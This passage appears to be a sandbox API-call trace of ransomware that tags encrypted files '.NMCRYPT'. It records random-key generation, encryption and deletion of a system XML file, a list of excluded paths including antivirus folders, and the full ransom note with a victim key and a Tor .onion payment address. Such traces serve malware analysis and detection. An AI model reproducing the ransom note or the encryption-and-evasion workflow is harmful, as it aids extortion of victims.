CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.645] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.646] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.646] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.647] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0156.647] CryptHashData (hHash=0x9ad138, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.647] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad3b8) returned 1 [0156.647] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.647] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.647] wcslen (_String="\\\\?\\") returned 0x4 [0156.647] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad7f8) returned 1 [0156.647] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.648] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=392) returned 1 [0156.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.648] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.649] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0156.649] GetLastError () returned 0x0 [0156.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0156.650] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x88, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x88, lpOverlapped=0x0) returned 1 [0156.651] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x88, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x90) returned 1 [0156.651] GetLastError () returned 0x0 [0156.651] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x90, lpOverlapped=0x0) returned 1 [0156.651] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0156.651] WriteFile (in: hFile=0x588, lpBuffer=0x607e28*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0156.651] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0x20 [0156.651] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", dwFileAttributes=0x20) returned 0 [0156.651] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 1 [0156.651] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0 [0156.651] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" [0156.652] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 1 [0156.652] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD716.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd716.tmp")) returned 0xd716 [0156.652] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD716.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd716.tmp"), dwFlags=0x1) returned 0 [0156.653] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xXD716.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\.xxd716.tmp")) returned 1 [0156.653] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0156.653] wcslen (_String="OK") returned 0x2 [0156.653] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.653] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.653] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0156.653] CryptDestroyHash (hHash=0x9ad138) returned 1 [0156.653] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0156.653] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0156.653] GetLastError () returned 0x12 [0156.653] FindClose (in: hFindFile=0x9ad238 | out: hFindFile=0x9ad238) returned 1 [0156.653] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0156.654] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0156.654] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0156.654] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0156.654] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.654] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.654] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0156.654] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.654] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0156.654] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*.exe") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*.dll") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*.lnk") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*.bat") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*.ini") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*.msi") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*.scf") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*pagefile.sys*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*NTUSER.DAT*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*AppData*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\winrar\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\java\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\windows\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\ESET\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\AVG\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\AVIRA\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*Atheros*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*Realtek*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*bootmgr*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*boot*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*boot*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*CONFIG.SYS*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*IO.SYS*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*MSDOS.SYS*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*NTDETECT.COM*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*ntldr*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*chrome*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*opera*") returned 0 [0156.655] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", pszSpec="*firefox*") returned 0 [0156.655] wcslen (_String="\\\\?\\") returned 0x4 [0156.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad478 [0156.656] wcscmp (_String1=".", _String2=".") returned 0 [0156.656] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.656] wcscmp (_String1="..", _String2=".") returned 1 [0156.656] wcscmp (_String1="..", _String2="..") returned 0 [0156.656] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0156.656] PathMatchSpecW (pszFile="base.xml", pszSpec="*NMCRYPT") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*Recovers your files.html") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*.exe") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*.dll") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*.lnk") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*.bat") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*.ini") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*.msi") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*.scf") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*pagefile.sys*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*NTUSER.DAT*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*AppData*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\winrar\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\java\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\windows\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\ESET\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\AVG\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\AVIRA\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*Atheros*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*Realtek*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*bootmgr*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*boot*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*boot*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*CONFIG.SYS*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*IO.SYS*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*MSDOS.SYS*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*NTDETECT.COM*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*ntldr*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*chrome*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*opera*") returned 0 [0156.657] PathMatchSpecW (pszFile="base.xml", pszSpec="*firefox*") returned 0 [0156.657] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml", pszSpec="*") returned 1 [0156.657] strlen (_Str="NMoreira") returned 0x8 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.657] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 